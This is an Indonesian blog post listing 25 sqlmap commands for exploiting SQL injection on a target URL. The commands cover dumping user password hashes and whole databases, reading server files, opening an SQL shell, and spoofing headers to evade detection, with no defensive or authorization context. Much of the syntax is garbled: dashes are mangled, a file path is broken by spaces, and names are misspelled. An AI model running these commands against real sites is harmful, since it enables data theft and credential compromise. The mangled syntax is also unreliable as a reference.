Pentesting Tools, Tutorial, and Information Technology

Sabtu, 13 Januari 2018

25 Command SQLmap Yang Berguna




Beberapa perintah sqlmap yang berguna untuk menguji kerentanan injeksi SQL.



1.Menganalisis user saat ini adalah dba
# python sqlmap.py -u “url” –is-dba -v 1

2) — users: daftar pengguna sistem manajemen basis data
# python sqlmap.py -u “url” –users -v 0

3) — passwords: Database user password (hash)
# python sqlmap.py -u “url” –passwords -v 0
# python sqlmap.py -u “url” –passwords -U sa -v 0

4) Untuk melihat hak akses user
# python sqlmap.py -u “url” –privileges -v 0
# python sqlmap.py -u “url” –privileges -U postgres -v 0

5) — dbs bisa menggunakan database
# python sqlmap.py -u “url” –dbs -v 0

6) — tables column dalam sebuah table
# python sqlmap.py -u “url” –tables -D “information_scheam”
-D: Menentukan nama data

7) — columns tercantum dalam nama column tabel
# python sqlmap.py -u “url” –columns -T “user” -D “mysql” -v 1
-T: Tentukan nama table, -D: Menentukan nama database

8) — dump isi column yang ditentukan dalam list
# python sqlmap.py -u “url” –dump -T “users” -D “testdb”
-C: Anda bisa menentukan field
The specified column in the range of 2-4
# python sqlmap.py -u “url” –dump -T “users” -D “testdb” –start 2 –stop 4 -v 0

9) — dump-all Daftar semua database, semua isi tabel
# python sqlmap.py -u “url” –dump-all -v 0
Hanya daftar isi database dan tabel baru user
# python sqlmap.py -u “url” –dump-all –exclude-sysdbs -v 0

10) — file untuk membaca isi dokumen [load_file () function]
# python sqlmap.py -u “url” –file / etc / password

11) execute SQL
# python sqlmap.py -u “url” –sql-shell

12) -p parameter yang ditentukan
# python sqlmap.py -u “url” -v 1 -p “id”
Anda dapat menentukan beberapa parameter -p -p "cat, id"

13) POST submission
# python sqlmap.py -u “url” –method POST –data “id = 1”

14) COOKIE Submit
# python sqlmap.py -u “url” –cookie “id = 1” -v 1
Value cookie bisa di crawl oleh TamperData

15) refer to deceive
# python sqlmap.py -u “url” –refer “url” -v 3

16) menggunakan khusus user-agent atau user-agents.txt
# python sqlmap.py -u “url” –user-agent “Mozilla / 4.0 (compatible; MSIE 7.0; Windows NT 5.1)” -v 3
# python sqlmap.py -u “url” -v 1 -a “./txt/user-agents.txt”

17) menggunakan multithreading guess solution
# python sqlmap.py -u “url” -v 1 –current-user –threads 3

18) tentukan database, bypassing automatic detection SQLMAP
# python sqlmap.py -u “url” -v 2 –dbms “PostgreSQL”

19) Menentukan sistem operasi secara otomatis mendeteksi bypass SQLMAP
# python sqlmap.py -u “url” -v 2 –os “Windows”

20) — prefix dan –postfix custom payload
# python sqlmap.py -u “url” -v 3 -p “id” –prefix ” ‘” –postfix “and’ test ‘=’ test”

21) union injection test
# python sqlmap.py -u “url” –union-test -v -1

22) dengan order by
# python sqlmap.py -u “url” –union-test –union-tech orderby -v 1

23)
# python sqlmap.py -u “url” -v 1 –union-use –banner

24)
# python sqlmap.py -u “url” -v 5 –union-use –current-user
25)
# python sqlmap.py -u “url” -v 1 –union-use –dbs

Tidak ada komentar:

Posting Komentar